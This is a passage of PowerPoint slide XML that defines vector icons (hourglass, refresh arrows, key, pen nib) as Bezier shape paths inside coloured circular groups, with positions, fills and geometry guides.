                    <a:pt x="283" y="115"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="62"/>
                    <a:pt x="283" y="62"/>
                    <a:pt x="283" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="35"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="0"/>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="168"/>
                    <a:pt x="97" y="213"/>
                    <a:pt x="97" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="292"/>
                    <a:pt x="0" y="328"/>
                    <a:pt x="0" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="0" y="443"/>
                    <a:pt x="0" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="460"/>
                    <a:pt x="61" y="496"/>
                    <a:pt x="142" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="496"/>
                    <a:pt x="283" y="460"/>
                    <a:pt x="283" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="443"/>
                    <a:pt x="283" y="434"/>
                    <a:pt x="283" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="328"/>
                    <a:pt x="186" y="292"/>
                    <a:pt x="186" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="213"/>
                    <a:pt x="283" y="168"/>
                    <a:pt x="283" y="115"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="44" y="62"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="53"/>
                    <a:pt x="88" y="35"/>
                    <a:pt x="142" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="35"/>
                    <a:pt x="239" y="62"/>
                    <a:pt x="239" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="62"/>
                    <a:pt x="257" y="71"/>
                    <a:pt x="248" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="88"/>
                    <a:pt x="186" y="97"/>
                    <a:pt x="142" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="97"/>
                    <a:pt x="53" y="88"/>
                    <a:pt x="35" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="71"/>
                    <a:pt x="44" y="62"/>
                    <a:pt x="44" y="62"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151" y="248"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="283"/>
                    <a:pt x="177" y="301"/>
                    <a:pt x="204" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="345"/>
                    <a:pt x="248" y="372"/>
                    <a:pt x="248" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="416"/>
                    <a:pt x="248" y="416"/>
                    <a:pt x="248" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="407"/>
                    <a:pt x="151" y="390"/>
                    <a:pt x="151" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="337"/>
                    <a:pt x="133" y="337"/>
                    <a:pt x="133" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="390"/>
                    <a:pt x="61" y="407"/>
                    <a:pt x="35" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="381"/>
                    <a:pt x="35" y="381"/>
                    <a:pt x="35" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="372"/>
                    <a:pt x="61" y="345"/>
                    <a:pt x="80" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="301"/>
                    <a:pt x="133" y="283"/>
                    <a:pt x="133" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="222"/>
                    <a:pt x="106" y="203"/>
                    <a:pt x="80" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="159"/>
                    <a:pt x="35" y="132"/>
                    <a:pt x="35" y="115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61" y="106"/>
                    <a:pt x="97" y="115"/>
                    <a:pt x="142" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="115"/>
                    <a:pt x="230" y="106"/>
                    <a:pt x="248" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="115"/>
                    <a:pt x="248" y="115"/>
                    <a:pt x="248" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="132"/>
                    <a:pt x="221" y="159"/>
                    <a:pt x="204" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="203"/>
                    <a:pt x="151" y="222"/>
                    <a:pt x="151" y="2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2D0A4A24-10B8-4FEA-8FA4-35B050E87B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="332950" y="1683605"/>
            <a:ext cx="565293" cy="565293"/>
            <a:chOff x="332950" y="1683605"/>
            <a:chExt cx="565293" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr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C58EB536-5F83-4112-AFA3-B870C97D0B00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332950" y="1683605"/>
              <a:ext cx="565293" cy="565293"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2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1" name="Freeform 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B82BDCD-664A-45A6-9B6D-F0CA9876C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99" y="1845720"/>
              <a:ext cx="300794" cy="241062"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76114 w 497"/>
                <a:gd name="T1" fmla="*/ 87900 h 400"/>
                <a:gd name="T2" fmla="*/ 76114 w 497"/>
                <a:gd name="T3" fmla="*/ 87900 h 400"/>
                <a:gd name="T4" fmla="*/ 111694 w 497"/>
                <a:gd name="T5" fmla="*/ 123329 h 400"/>
                <a:gd name="T6" fmla="*/ 147724 w 497"/>
                <a:gd name="T7" fmla="*/ 87900 h 400"/>
                <a:gd name="T8" fmla="*/ 111694 w 497"/>
                <a:gd name="T9" fmla="*/ 52023 h 400"/>
                <a:gd name="T10" fmla="*/ 76114 w 497"/>
                <a:gd name="T11" fmla="*/ 87900 h 400"/>
                <a:gd name="T12" fmla="*/ 52244 w 497"/>
                <a:gd name="T13" fmla="*/ 75791 h 400"/>
                <a:gd name="T14" fmla="*/ 52244 w 497"/>
                <a:gd name="T15" fmla="*/ 75791 h 400"/>
                <a:gd name="T16" fmla="*/ 111694 w 497"/>
                <a:gd name="T17" fmla="*/ 28254 h 400"/>
                <a:gd name="T18" fmla="*/ 155381 w 497"/>
                <a:gd name="T19" fmla="*/ 43950 h 400"/>
                <a:gd name="T20" fmla="*/ 175648 w 497"/>
                <a:gd name="T21" fmla="*/ 43950 h 400"/>
                <a:gd name="T22" fmla="*/ 175648 w 497"/>
                <a:gd name="T23" fmla="*/ 24217 h 400"/>
                <a:gd name="T24" fmla="*/ 111694 w 497"/>
                <a:gd name="T25" fmla="*/ 0 h 400"/>
                <a:gd name="T26" fmla="*/ 27923 w 497"/>
                <a:gd name="T27" fmla="*/ 64131 h 400"/>
                <a:gd name="T28" fmla="*/ 0 w 497"/>
                <a:gd name="T29" fmla="*/ 64131 h 400"/>
                <a:gd name="T30" fmla="*/ 0 w 497"/>
                <a:gd name="T31" fmla="*/ 87900 h 400"/>
                <a:gd name="T32" fmla="*/ 36030 w 497"/>
                <a:gd name="T33" fmla="*/ 87900 h 400"/>
                <a:gd name="T34" fmla="*/ 52244 w 497"/>
                <a:gd name="T35" fmla="*/ 75791 h 400"/>
                <a:gd name="T36" fmla="*/ 187357 w 497"/>
                <a:gd name="T37" fmla="*/ 87900 h 400"/>
                <a:gd name="T38" fmla="*/ 187357 w 497"/>
                <a:gd name="T39" fmla="*/ 87900 h 400"/>
                <a:gd name="T40" fmla="*/ 171594 w 497"/>
                <a:gd name="T41" fmla="*/ 103597 h 400"/>
                <a:gd name="T42" fmla="*/ 111694 w 497"/>
                <a:gd name="T43" fmla="*/ 151134 h 400"/>
                <a:gd name="T44" fmla="*/ 68007 w 497"/>
                <a:gd name="T45" fmla="*/ 131402 h 400"/>
                <a:gd name="T46" fmla="*/ 48190 w 497"/>
                <a:gd name="T47" fmla="*/ 131402 h 400"/>
                <a:gd name="T48" fmla="*/ 48190 w 497"/>
                <a:gd name="T49" fmla="*/ 151134 h 400"/>
                <a:gd name="T50" fmla="*/ 111694 w 497"/>
                <a:gd name="T51" fmla="*/ 178940 h 400"/>
                <a:gd name="T52" fmla="*/ 195915 w 497"/>
                <a:gd name="T53" fmla="*/ 115257 h 400"/>
                <a:gd name="T54" fmla="*/ 223388 w 497"/>
                <a:gd name="T55" fmla="*/ 115257 h 400"/>
                <a:gd name="T56" fmla="*/ 223388 w 497"/>
                <a:gd name="T57" fmla="*/ 87900 h 400"/>
                <a:gd name="T58" fmla="*/ 187357 w 497"/>
                <a:gd name="T59" fmla="*/ 87900 h 40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97" h="400">
                  <a:moveTo>
                    <a:pt x="169" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="169" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="240"/>
                    <a:pt x="204" y="275"/>
                    <a:pt x="248" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="275"/>
                    <a:pt x="328" y="240"/>
                    <a:pt x="328" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="151"/>
                    <a:pt x="292" y="116"/>
                    <a:pt x="248" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="116"/>
                    <a:pt x="169" y="151"/>
                    <a:pt x="169" y="196"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="169"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116" y="169"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="107"/>
                    <a:pt x="186" y="63"/>
                    <a:pt x="248" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="63"/>
                    <a:pt x="319" y="71"/>
                    <a:pt x="345" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="107"/>
                    <a:pt x="381" y="107"/>
                    <a:pt x="390" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="89"/>
                    <a:pt x="399" y="71"/>
                    <a:pt x="390" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="18"/>
                    <a:pt x="301" y="0"/>
                    <a:pt x="248" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="0"/>
                    <a:pt x="80" y="54"/>
                    <a:pt x="62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80" y="196"/>
                    <a:pt x="80" y="196"/>
                    <a:pt x="80" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="196"/>
                    <a:pt x="107" y="178"/>
                    <a:pt x="116" y="169"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="416" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="196"/>
                    <a:pt x="390" y="222"/>
                    <a:pt x="381" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="293"/>
                    <a:pt x="319" y="337"/>
                    <a:pt x="248" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="337"/>
                    <a:pt x="177" y="319"/>
                    <a:pt x="151" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="284"/>
                    <a:pt x="116" y="284"/>
                    <a:pt x="107" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="310"/>
                    <a:pt x="97" y="328"/>
                    <a:pt x="107" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="373"/>
                    <a:pt x="195" y="399"/>
                    <a:pt x="248" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="399"/>
                    <a:pt x="416" y="337"/>
                    <a:pt x="435" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="257"/>
                    <a:pt x="496" y="257"/>
                    <a:pt x="496" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="196"/>
                    <a:pt x="496" y="196"/>
                    <a:pt x="496" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="416" y="19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E7DEED6F-4B3B-4674-A804-836CE4437C42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8834871" y="1683533"/>
            <a:ext cx="565293" cy="565293"/>
            <a:chOff x="8834871" y="1683533"/>
            <a:chExt cx="565293" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr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0EFF2D3C-CF7E-490E-9712-F87A08C55BF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8834871" y="1683533"/>
              <a:ext cx="565293" cy="565293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 w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2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2" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E335BCAB-7342-4DC7-B6E5-AB1E241FF41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984383" y="1800057"/>
              <a:ext cx="266268" cy="332245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 170867 w 400"/>
                <a:gd name="T1" fmla="*/ 55735 h 498"/>
                <a:gd name="T2" fmla="*/ 170867 w 400"/>
                <a:gd name="T3" fmla="*/ 55735 h 498"/>
                <a:gd name="T4" fmla="*/ 103597 w 400"/>
                <a:gd name="T5" fmla="*/ 4045 h 498"/>
                <a:gd name="T6" fmla="*/ 51574 w 400"/>
                <a:gd name="T7" fmla="*/ 67871 h 498"/>
                <a:gd name="T8" fmla="*/ 59647 w 400"/>
                <a:gd name="T9" fmla="*/ 95738 h 498"/>
                <a:gd name="T10" fmla="*/ 4036 w 400"/>
                <a:gd name="T11" fmla="*/ 182936 h 498"/>
                <a:gd name="T12" fmla="*/ 0 w 400"/>
                <a:gd name="T13" fmla="*/ 195072 h 498"/>
                <a:gd name="T14" fmla="*/ 4036 w 400"/>
                <a:gd name="T15" fmla="*/ 214849 h 498"/>
                <a:gd name="T16" fmla="*/ 12109 w 400"/>
                <a:gd name="T17" fmla="*/ 223389 h 498"/>
                <a:gd name="T18" fmla="*/ 27805 w 400"/>
                <a:gd name="T19" fmla="*/ 218894 h 498"/>
                <a:gd name="T20" fmla="*/ 39914 w 400"/>
                <a:gd name="T21" fmla="*/ 211253 h 498"/>
                <a:gd name="T22" fmla="*/ 63683 w 400"/>
                <a:gd name="T23" fmla="*/ 175295 h 498"/>
                <a:gd name="T24" fmla="*/ 63683 w 400"/>
                <a:gd name="T25" fmla="*/ 175295 h 498"/>
                <a:gd name="T26" fmla="*/ 79379 w 400"/>
                <a:gd name="T27" fmla="*/ 171250 h 498"/>
                <a:gd name="T28" fmla="*/ 103597 w 400"/>
                <a:gd name="T29" fmla="*/ 127651 h 498"/>
                <a:gd name="T30" fmla="*/ 131402 w 400"/>
                <a:gd name="T31" fmla="*/ 127651 h 498"/>
                <a:gd name="T32" fmla="*/ 170867 w 400"/>
                <a:gd name="T33" fmla="*/ 55735 h 498"/>
                <a:gd name="T34" fmla="*/ 143062 w 400"/>
                <a:gd name="T35" fmla="*/ 71466 h 498"/>
                <a:gd name="T36" fmla="*/ 143062 w 400"/>
                <a:gd name="T37" fmla="*/ 71466 h 498"/>
                <a:gd name="T38" fmla="*/ 114808 w 400"/>
                <a:gd name="T39" fmla="*/ 63825 h 498"/>
                <a:gd name="T40" fmla="*/ 99112 w 400"/>
                <a:gd name="T41" fmla="*/ 35958 h 498"/>
                <a:gd name="T42" fmla="*/ 139026 w 400"/>
                <a:gd name="T43" fmla="*/ 31913 h 498"/>
                <a:gd name="T44" fmla="*/ 143062 w 400"/>
                <a:gd name="T45" fmla="*/ 71466 h 49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00" h="498">
                  <a:moveTo>
                    <a:pt x="381" y="124"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="381" y="124"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="44"/>
                    <a:pt x="301" y="0"/>
                    <a:pt x="231" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="27"/>
                    <a:pt x="106" y="80"/>
                    <a:pt x="115" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="168"/>
                    <a:pt x="124" y="195"/>
                    <a:pt x="133" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="407"/>
                    <a:pt x="9" y="407"/>
                    <a:pt x="9" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="407"/>
                    <a:pt x="0" y="425"/>
                    <a:pt x="0" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="478"/>
                    <a:pt x="9" y="478"/>
                    <a:pt x="9" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="487"/>
                    <a:pt x="18" y="497"/>
                    <a:pt x="27" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="487"/>
                    <a:pt x="62" y="487"/>
                    <a:pt x="62" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="487"/>
                    <a:pt x="80" y="478"/>
                    <a:pt x="89" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="390"/>
                    <a:pt x="142" y="390"/>
                    <a:pt x="142" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="381"/>
                    <a:pt x="177" y="381"/>
                    <a:pt x="177" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="284"/>
                    <a:pt x="231" y="284"/>
                    <a:pt x="231" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="293"/>
                    <a:pt x="284" y="284"/>
                    <a:pt x="293" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="275"/>
                    <a:pt x="399" y="195"/>
                    <a:pt x="381" y="124"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="319" y="159"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319" y="159"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="187"/>
                    <a:pt x="284" y="168"/>
                    <a:pt x="256" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="124"/>
                    <a:pt x="203" y="115"/>
                    <a:pt x="221" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="53"/>
                    <a:pt x="284" y="44"/>
                    <a:pt x="310" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="89"/>
                    <a:pt x="346" y="133"/>
                    <a:pt x="319" y="1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8DF28524-E55D-4A0A-8F84-4DB7409202DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="317861" y="4255358"/>
            <a:ext cx="565293" cy="565293"/>
            <a:chOff x="317861" y="4255358"/>
            <a:chExt cx="565293" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name="Oval 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7243BCDA-97B9-4575-8D0C-B4A3777CC525}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="317861" y="4255358"/>
              <a:ext cx="565293" cy="565293"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2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57D7E05D-92CE-4EBE-BA45-C9293EC0A45A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="488114" y="4362829"/>
              <a:ext cx="224786" cy="350350"/>
              <a:chOff x="6690739" y="2657525"/>
              <a:chExt cx="397528" cy="619585"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="Freeform 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D062505D-EC6D-4EE8-86AF-5D244C05CC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90739" y="2657525"/>
                <a:ext cx="364919" cy="559024"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 245"/>
                  <a:gd name="T1" fmla="*/ 249 h 376"/>
                  <a:gd name="T2" fmla="*/ 0 w 245"/>
                  <a:gd name="T3" fmla="*/ 9 h 376"/>
                  <a:gd name="T4" fmla="*/ 99 w 245"/>
                  <a:gd name="T5" fmla="*/ 190 h 376"/>
                  <a:gd name="T6" fmla="*/ 88 w 245"/>
                  <a:gd name="T7" fmla="*/ 238 h 376"/>
                  <a:gd name="T8" fmla="*/ 139 w 245"/>
                  <a:gd name="T9" fmla="*/ 254 h 376"/>
                  <a:gd name="T10" fmla="*/ 156 w 245"/>
                  <a:gd name="T11" fmla="*/ 203 h 376"/>
                  <a:gd name="T12" fmla="*/ 110 w 245"/>
                  <a:gd name="T13" fmla="*/ 184 h 376"/>
                  <a:gd name="T14" fmla="*/ 17 w 245"/>
                  <a:gd name="T15" fmla="*/ 0 h 376"/>
                  <a:gd name="T16" fmla="*/ 212 w 245"/>
                  <a:gd name="T17" fmla="*/ 139 h 376"/>
                  <a:gd name="T18" fmla="*/ 245 w 245"/>
                  <a:gd name="T19" fmla="*/ 315 h 376"/>
                  <a:gd name="T20" fmla="*/ 129 w 245"/>
                  <a:gd name="T21" fmla="*/ 376 h 376"/>
                  <a:gd name="T22" fmla="*/ 3 w 245"/>
                  <a:gd name="T23" fmla="*/ 249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5" h="376">
                    <a:moveTo>
                      <a:pt x="3" y="24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99" y="190"/>
                      <a:pt x="99" y="190"/>
                      <a:pt x="99" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="201"/>
                      <a:pt x="79" y="222"/>
                      <a:pt x="88" y="238"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="257"/>
                      <a:pt x="121" y="264"/>
                      <a:pt x="139" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="245"/>
                      <a:pt x="165" y="221"/>
                      <a:pt x="156" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="186"/>
                      <a:pt x="127" y="179"/>
                      <a:pt x="110" y="184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12" y="139"/>
                      <a:pt x="212" y="139"/>
                      <a:pt x="212" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="315"/>
                      <a:pt x="245" y="315"/>
                      <a:pt x="245" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="376"/>
                      <a:pt x="129" y="376"/>
                      <a:pt x="129" y="376"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3" y="24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0" name="Freeform 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8042EC3A-7690-46DA-9D70-1B8C07F7A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9503" y="3135801"/>
                <a:ext cx="198764" cy="141309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 34 h 91"/>
                  <a:gd name="T2" fmla="*/ 18 w 128"/>
                  <a:gd name="T3" fmla="*/ 91 h 91"/>
                  <a:gd name="T4" fmla="*/ 0 w 128"/>
                  <a:gd name="T5" fmla="*/ 58 h 91"/>
                  <a:gd name="T6" fmla="*/ 110 w 128"/>
                  <a:gd name="T7" fmla="*/ 0 h 91"/>
                  <a:gd name="T8" fmla="*/ 128 w 128"/>
                  <a:gd name="T9" fmla="*/ 34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8" h="91">
                    <a:moveTo>
                      <a:pt x="128" y="34"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="3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60AD29AC-BF33-42B6-94AB-9A9A7AC83CE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4585416" y="4255286"/>
            <a:ext cx="565293" cy="565293"/>
            <a:chOff x="4585416" y="4255286"/>
            <a:chExt cx="565293" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="143" name="Oval 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{941A249E-5D46-45DE-8FA0-DD1A9878871C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4585416" y="4255286"/>
              <a:ext cx="565293" cy="565293"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6ABAD0"/>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2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1" name="Freeform 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DAB9E21-3FC3-4E90-B7E6-5C8B9F09ACB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21253" y="4388197"/>
              <a:ext cx="292613" cy="299470"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123628 w 452"/>
                <a:gd name="T1" fmla="*/ 135490 h 462"/>
                <a:gd name="T2" fmla="*/ 123628 w 452"/>
                <a:gd name="T3" fmla="*/ 135490 h 462"/>
